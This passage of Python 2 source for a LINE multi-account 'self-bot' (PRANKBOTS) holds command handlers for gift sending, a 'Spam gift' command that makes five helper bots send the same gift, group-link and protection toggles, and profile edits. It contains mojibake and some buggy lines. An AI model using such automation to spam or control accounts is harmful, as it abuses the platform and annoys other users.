'MSGTPL': '3'}
msg.text = None
acil.sendMessage(msg)
elif msg.text in ["Allgift","B2 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '3'}
msg.text = None
ki2.sendMessage(msg)
elif msg.text in ["Allgift","B3 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '4'}
msg.text = None
ki3.sendMessage(msg)
elif msg.text in ["Allgift","B4 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
ki4.sendMessage(msg)
elif msg.text in ["Allgift","B5 gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '3b92ccf5-54d3-4765-848f-c9ffdc1da020',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
ki5.sendMessage(msg)
elif msg.text in ["Spam gift"]:
#if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
ki2.sendMessage(msg)
ki3.sendMessage(msg)
ki4.sendMessage(msg)
ki5.sendMessage(msg)
elif msg.text in ["Clink"]:
if msg.toType == 2:
group = acil.getGroup(msg.to)
group.preventJoinByTicket = False
acil.updateGroup(group)
if wait["lang"] == "JP":
acil.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
acil.sendText(msg.to,"URL open ô€¨ô€„Œ")
else:
if wait["lang"] == "JP":
acil.sendText(msg.to,"It can not be used outside the group👈")
else:
acil.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Curl"]:
if msg.toType == 2:
group = acil.getGroup(msg.to)
group.preventJoinByTicket = True
acil.updateGroup(group)
if wait["lang"] == "JP":
acil.sendText(msg.to,"URL close 👈")
else:
acil.sendText(msg.to,"URL close 👈")
else:
if wait["lang"] == "JP":
acil.sendText(msg.to,"It can not be used outside the group 👈")
else:
acil.sendText(msg.to,"Can not be used for groups other than ")
elif msg.text.lower() == 'ginfo':
group = acil.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md ="✥GROUP NAME✥\n" + group.name + "\n\n✥GROUP ID✥\n✿" + group.id +"✿" "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\n✥TOTAL MEMBER✥\n" + str(len(group.members)) + " Orang" + "\n✥PENDINGAN✥\n" + str(len(group.invitee)) + " Orang"
acil.sendText(msg.to,md)
elif "Mymid" == msg.text:
acil.sendText(msg.to,mid)
elif "B1 mid" == msg.text:
ki.sendText(msg.to,kimid)
elif "B2 mid" == msg.text:
ki2.sendText(msg.to,ki2mid)
elif "B3 mid" == msg.text:
ki3.sendText(msg.to,ki3mid)
elif "B4 mid" == msg.text:
ki4.sendText(msg.to,ki4mid)
elif "B5 mid" == msg.text:
ki5.sendText(msg.to,ki5mid)
elif "All mid" == msg.text:
acil.sendText(msg.to,mid)
ki.sendText(msg.to,kimid)
ki2.sendText(msg.to,ki2mid)
ki3.sendText(msg.to,ki3mid)
ki4.sendText(msg.to,ki4mid)
ki5.sendText(msg.to,ki5mid)
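# "TL:<text>" posts <text> to the account's timeline and replies with a link to the new post.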
elif "TL:" in msg.text:
tl_text = msg.text.replace("TL:","")
acil.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+acil.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Allname " in msg.text:
string = msg.text.replace("Allname ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
acil.sendText(msg.to,"NAMA BOT BERHASIL DI TERAPKAN MENJADI\n👉" + string + "👈")
elif "Allbio " in msg.text:
string = msg.text.replace("Allbio ","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki2.getProfile()
profile.statusMessage = string
ki2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki3.getProfile()
profile.statusMessage = string
ki3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki4.getProfile()
profile.statusMessage = string
ki4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki5.getProfile()
profile.statusMessage = string
ki5.updateProfile(profile)
acil.sendText(msg.to,"SEMUA TELAH DI UPDATE BIO PROFILE\n👉" + string + "👈")
elif "Mybio " in msg.text:
string = msg.text.replace("Mybio ","")
if len(string.decode('utf-8')) <= 500:
profile = acil.getProfile()
profile.statusMessage = string
acil.updateProfile(profile)
acil.sendText(msg.to,"??Update Bio\n👉" + string + "👈")
#------------------------------------------------------------------------------------------#
elif "Cn " in msg.text:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = acil.getProfile()
profile.displayName = string
acil.updateProfile(profile)
acil.sendText(msg.to,"Update Names👉 " + string + "👈")
#---------------------------------------------------------
elif "B1name " in msg.text:
string = msg.text.replace("B1name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B2name " in msg.text:
string = msg.text.replace("B2name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B3name " in msg.text:
string = msg.text.replace("B3name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "B4name " in msg.text:
string = msg.text.replace("B4name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
#--------------------------------------------------------
elif "B5name " in msg.text:
string = msg.text.replace("B5name ","")
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to," Update Names👉" + string + "👈")
elif "Contact " in msg.text:
mmid = msg.text.replace("Contact ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
acil.sendMessage(msg)
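# "Allprotect:on" flips every protection flag at once: kick protect, QR-link protect,
# invite protect, the name lock for this group, and cancel protect.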
elif msg.text in ["Allprotect:on"]:
if wait["protect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["protect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable✔")
else:
acil.sendText(msg.to,"It is already On ✔")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protect Enable")
else:
acil.sendText(msg.to,"It is already On ô€¨")
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable")
else:
acil.sendText(msg.to,"It is already On ¨")
if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN ON")
else:
acil.sendText(msg.to,"ALREADY ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = acil.getGroup(msg.to).name
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON✔")
else:
acil.sendText(msg.to,"It is already On ✔")
#=====================================================================================
elif msg.text in ["Allprotect:off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Disable ✔")
else:
acil.sendText(msg.to,"sudah dimatikan ✔")
else:
wait["protect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close")
else:
acil.sendText(msg.to,"It is already open ✔")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
if msg.to in wait['pname']:
acil.sendText(msg.to,"TURN OFF")
del wait['pname'][msg.to]
else:
acil.sendText(msg.to,"ALREADY OFF")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
#=====================================================================================
elif msg.text.lower() == 'contact:on':
if wait["contact"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Sudah On")
else:
acil.sendText(msg.to,"It is already open")
else:
wait["contact"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already open ✔")
else:
acil.sendText(msg.to,"It is already open ")
elif msg.text.lower() == 'contact:off':
if wait["contact"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"sudah off ✖")
else:
acil.sendText(msg.to,"It is already off ✖")
else:
wait["contact"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"off already")
else:
acil.sendText(msg.to,"already Close ✔")
elif msg.text in ["Pro:on"]:
if wait["protect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable ??✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["protect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Enable✔")
else:
acil.sendText(msg.to,"It is already On ✔")
elif msg.text in ['Prolink:on']:
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protect Enable")
else:
acil.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ['Proinvite:on']:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protect Enable")
else:
acil.sendText(msg.to,"It is already On ¨")
elif msg.text in ['Procancel:on']:
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Enable ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON✔")
else:
acil.sendText(msg.to,"It is already On ✔")
elif msg.text.lower() == 'join:on':
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Ini sudah on✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✔")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON✔")
else:
acil.sendText(msg.to,"It is already On ✔")
elif msg.text.lower() == 'blocklist':
blockedlist = acil.getBlockedContactIds()
acil.sendText(msg.to, "Please wait...")
kontak = acil.getContacts(blockedlist)
num=1
msgs="✖User Blocked List✖\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
acil.sendText(msg.to, msgs)
elif msg.text.lower() == 'join:off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Auto Join Already Off✔")
else:
acil.sendText(msg.to,"Auto Join set off✔")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✔")
else:
acil.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Pro:off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Protection Disable ✔")
else:
acil.sendText(msg.to,"sudah dimatikan ✔")
else:
wait["protect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close")
else:
acil.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Prolink:off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Link Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Proinvite:off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Invite Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
elif msg.text in ["Procancel:off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Cancel Protection Disable ✖")
else:
acil.sendText(msg.to,"sudah dimatikan ✖")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already close✖")
else:
acil.sendText(msg.to,"It is already open ✔")
elif "Join:" in msg.text:
try:
strnum = msg.text.replace("Join:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Itu off undangan ditolak✖\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan✖")
else:
acil.sendText(msg.to,"Off undangan ditolak✖Sebutkan jumlah terbuka ketika Anda ingin mengirim")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis✔")
else:
acil.sendText(msg.to,strnum + "The team declined to create the following automatic invitation")
except:
if wait["lang"] == "JP":
acil.sendText(msg.to,"")
else:
acil.sendText(msg.to,"Weird value✖")
elif msg.text in ["Leave:on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"on✔")
else:
acil.sendText(msg.to,"Sudah terbuka ✔")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done✔")
else:
acil.sendText(msg.to,"Is already open✔")
elif msg.text in ["Leave:off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"off✖")
else:
acil.sendText(msg.to,"Sudah off✖")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done✔")
else:
acil.sendText(msg.to,"Is already close✔")
elif msg.text in ["Share:on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done ✔")
else:
acil.sendText(msg.to,"Hal ini sudah terbuka ✖")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"on ✔")
else:
acil.sendText(msg.to,"on ✔")
elif msg.text in ["Share:off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done✔")
else:
acil.sendText(msg.to,"It is already turned off ✔")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Off ✖")
else:
acil.sendText(msg.to,"Off ✖")
elif msg.text.lower() == 'set':
md = "╔▬▬℘ґ∂ηк в❍тs▬▬╗\n║▬▬▬℘▬▬в▬▬▬║\n"
if wait["likeOn"] == True: md+="║☆║Like:ON➡️📱\n"
else: md+="║☆║Like:OFF➡️📴\n"
if wait["wcOn"] == True: md+="║☆║Welcome:ON➡️📱\n"
else: md+="║☆║Welcome:OFF➡️📴\n"
if wait["leftOn"] == True: md+="║☆║Left:ON➡️📱\n"
else: md+="║☆║Left:OFF➡️📴\n"
if wait["detectMention"] == True: md+="║☆║Respon:ON➡️📱\n"
else: md +="║☆║Respon:OFF➡️📴\n"
if wait["stickerMention"] == True: md+="║☆║Stickertag:ON➡️📱\n"
else: md +="║☆║Stickertag:OFF➡️📴\n"
if settings["simiSimi"] == True: md+="║☆║Simisimi:ON➡️📱\n"
else: md+="║☆║Simisimi:OFF➡️📴\n"
if wait["alwayRead"] == True: md+="║☆║Auto read:ON➡️📱\n"
else: md+="║☆║Auto read:OFF➡️📴\n"
if wait["Sider"] == True: md+="║☆║Sider:ON➡️📱\n"
else: md+="║☆║Sider:OFF➡️📴\n"
if wait["kickMention"] == True: md+="║☆║Notag:ON➡️📱\n"
else:md+="║☆║Notag:OFF➡️📴\n"
if wait["contact"] == True: md+="║☆║Contact:ON➡️📱\n"
else: md+="║☆║Contact:OFF➡️📴\n"
if wait["autoJoin"] == True: md+="║☆║Join:ON➡️📱\n"
else: md +="║☆║Join:OFF➡️📴\n"
if wait["autoCancel"]["on"] == True:md+="║☆║Cancel:" + str(wait["autoCancel"]["members"]) + "➡️📱\n"
else: md+= "║☆║Cancel:OFF➡️📴\n"
if wait["leaveRoom"] == True: md+="║☆║Leave:ON➡️📱\n"
else: md+="║☆║Leave:OFF➡️📴\n"
if wait["timeline"] == True: md+="║☆║Share:ON➡️📱\n"
else:md+="║☆║Share:OFF➡️📴\n"
if wait["autoAdd"] == True: md+="║☆║Add:ON➡️📱\n"
else:md+="║☆║Add:OFF➡️??\n"
if wait["commentOn"] == True: md+="║☆║Com:ON➡️📱\n"
else:md+="║☆║Com:OFF➡️??\n║▬║❨◄▬▬▬►❩\n║☆║◄═PROTECTION═►\n║▬║▬PRANKBOTS▬╣\n"
if wait["protect"] == True: md+="║☆║Pro:ON➡️📱\n"
else:md+="║☆║Pro:OFF➡️📴\n"
if wait["linkprotect"] == True: md+="║☆║ProtectQr:ON➡️📱\n"
else:md+="║☆║ProtectQr:OFF➡️📴\n"
if wait["inviteprotect"] == True: md+="║☆║Proinvite:ON➡️📱\n"
else:md+="║☆║Proinvite:OFF➡️📴\n"
if wait["cancelprotect"] == True: md+"║☆║Procancel:ON➡️📱\n"
else:md+="║☆║Procancel:OFF➡️📴\n"
if wait["pname"] == True: md+="║☆║Namelock:ON➡️📱\n"
else: md+="║☆║Namelock:OFF➡️📴\n"
acil.sendText(msg.to,md + "║▬▬▬℘▬▬в▬▬▬║\n╚▬▬℘ґ∂ηк в❍тs▬▬╝")
elif "Creatorgrup" == msg.text:
try:
group = acil.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
GS = acil.getContact(msg.to)
acil.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
acil.sendMessage(M)
W = acil.getContact(msg.to)
acil.sendText(msg.to,"old user")
elif cms(msg.text,["Add"]):
msg.contentType = 13
msg.contentMetadata = {'mid': 'u5818cb4404411c2e2e6e6937d172cca8'}
acil.sendText(msg.to,"❂•••••••••✧••••••••••❂")
acil.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': 'udfaf52176415b46cb445ae2757ec85f3'}
acil.sendMessage(msg)
acil.sendText(msg.to,"❂••••••••✰•✰••••••••❂")
elif "Tagme: " in msg.text:
c = msg.text.replace("Tagme: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["tagme"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Welcome: " in msg.text:
c = msg.text.replace("Welcome: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["joingc"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Left: " in msg.text:
c = msg.text.replace("Left: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["leftgc"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Sider: " in msg.text:
c = msg.text.replace("Sider: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["sider1"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Setrespon: " in msg.text:
c = msg.text.replace("Setrespon: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["responName"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif "Cekresponse" in msg.text:
acil.sendText(msg.to,"👇Respon saat di tag👇\n" + wait["tagme"])
acil.sendText(msg.to,"👇Respon saat di add👇\n" + wait["comment"])
acil.sendText(msg.to,"👇Respon saat member join👇\n" + wait["joingc"])
acil.sendText(msg.to,"👇Respon saat member left👇\n" + wait["leftgc"])
acil.sendText(msg.to,"👇Respon saat member readchat👇\n" + wait["sider1"])
acil.sendText(msg.to,"👇Respon saat member memanggil👇\n" + wait["responName"])
acil.sendText(msg.to,"👇Respon di autolike👇\n" + wait["comment1"] + "\n\nHAL INI TIDAK DAPAT DI UBAH SESUAI HAK CIPTA\nCREATOR::PRANKBOTS")
elif msg.text in ["Left:on"]:
if wait["leftOn"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done")
else:
wait["leftOn"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already")
elif msg.text in ["Left:off"]:
if wait["leftOn"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done")
else:
wait["leftOn"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already")
elif msg.text in ["Welcome:on"]:
if wait['wcOn'] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"sudah ON")
else:
wait["wcOn"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"already ON")
elif msg.text in ["Welcome:off"]:
if wait['wcOn'] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Sudah off")
else:
wait['wcOn'] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"already OFF")
elif msg.text.lower() == 'group id':
gid = acil.getGroupIdsJoined()
h = "❂•••••••••L I S T I D G R O U P••••••••••❂\n "
for i in gid:
h += "[%s]:%s\n" % (acil.getGroup(i).name,i)
acil.sendText(msg.to,h)
elif msg.text in ["Gcancelall"]:
gid = acil.getGroupIdsInvited()
for i in gid:
acil.rejectGroupInvitation(i)
if wait["lang"] == "JP":
acil.sendText(msg.to,"Success menolak semua undangan")
else:
acil.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Add:on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already On✔")
else:
acil.sendText(msg.to,"Already On✔")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already On✔")
else:
acil.sendText(msg.to,"Already On✔")
elif msg.text in ["Add:off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Hal ini sudah off✖")
else:
acil.sendText(msg.to,"Hal ini sudah dimatikan✖")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already Off✖")
else:
acil.sendText(msg.to,"Untuk mengaktifkan-off✖")
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
acil.sendText(msg.to,"✨We changed the message✨")
elif "Help set:" in msg.text:
wait["help"] = msg.text.replace("Help set:","")
acil.sendText(msg.to,"✨We changed the Help✨")
elif "Msg add-" in msg.text:
wait["message"] = msg.text.replace("Pesan add-","")
if wait["lang"] == "JP":
acil.sendText(msg.to,"✨Kami mengubah pesan✨")
else:
acil.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message confirm"]:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
acil.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
acil.sendText(msg.to,"I changed the language to engglis✔")
else:
wait["lang"] = "JP"
acil.sendText(msg.to,"I changed the language to indonesia✔")
elif "Message set: " in msg.text:
c = msg.text.replace("Message set: ","")
if c in [""," ","\n",None]:
acil.sendText(msg.to,"Is a string that can not be changed✔")
else:
wait["comment"] = c
acil.sendText(msg.to,"✨This has been changed✨\n\n" + c)
elif msg.text in ["Comment:on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Aku berada di✔")
else:
acil.sendText(msg.to,"To open✔")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"✔")
else:
acil.sendText(msg.to,"✔")
elif msg.text in ["Com:off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Hal ini sudah off ✖")
else:
acil.sendText(msg.to,"It is already turned off ✖")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Off✖")
else:
acil.sendText(msg.to,"To turn off✖")
elif msg.text in ["Com","Comment"]:
acil.sendText(msg.to,"✨Auto komentar saat ini telah ditetapkan sebagai berikut✨\n\n" + str(wait["comment"]))
elif msg.text in ["Glink","Url"]:
if msg.toType == 2:
g = acil.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
acil.updateGroup(g)
gurl = acil.reissueGroupTicket(msg.to)
acil.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Hal ini tidak dapat digunakan di luar kelompok")
else:
acil.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif "gurl+" in msg.text:
if msg.toType == 2:
gid = msg.text.replace("gurl+","")
gurl = acil.reissueGroupTicket(gid)
acil.sendText(msg.to,"line://ti/g/" + gurl)
else:
acil.sendText(msg.to,"グループ以外ã§ã¯ä½¿ç”¨ã§ãã¾ã›ã‚“👈")
elif "gurl" in msg.text:
if msg.toType == 1:
tid = msg.text.replace("gurl","")
turl = ki.getUserTicket(tid)
ki.sendText(msg.to,"line://ti/p" + turl)
else:
ki.sendText(msg.to,"error")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
x = acil.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
acil.updateGroup(x)
gurl = acil.reissueGroupTicket(msg.to)
acil.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Can't be used outside the group")
else:
acil.sendText(msg.to,"Not for use less than group")
# else:
# acil.sendText(msg.to,"Tidak dapat digunakan untuk kelompok selain")
elif msg.text in ["Comban"]:
wait["wblack"] = True
acil.sendText(msg.to,"Please send contacts from the person you want to add to the blacklist…”✚")
elif msg.text in ["Comban del"]:
wait["dblack"] = True
acil.sendText(msg.to,"Please send contacts from the person you want to add from the blacklist…”✚")
elif msg.text in ["Comban cek"]:
if wait["commentBlack"] == {}:
acil.sendText(msg.to,"Nothing in the blacklist✖")
else:
acil.sendText(msg.to,"The following is a blacklist✔")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +acil.getContact(mi_d).displayName + "\n"
acil.sendText(msg.to,mc)
elif msg.text in ["Like:on","Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already")
elif msg.text in ["Like off","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
acil.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
acil.sendText(msg.to,"Already")
elif "Namelock:on" in msg.text:
# if msg.from_ in admin or owner:
if msg.to in wait['pname']:
acil.sendText(msg.to,"ALREADY ON")
else:
acil.sendText(msg.to,"TURN ON")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = acil.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
# if msg.from_ in admin or owner:
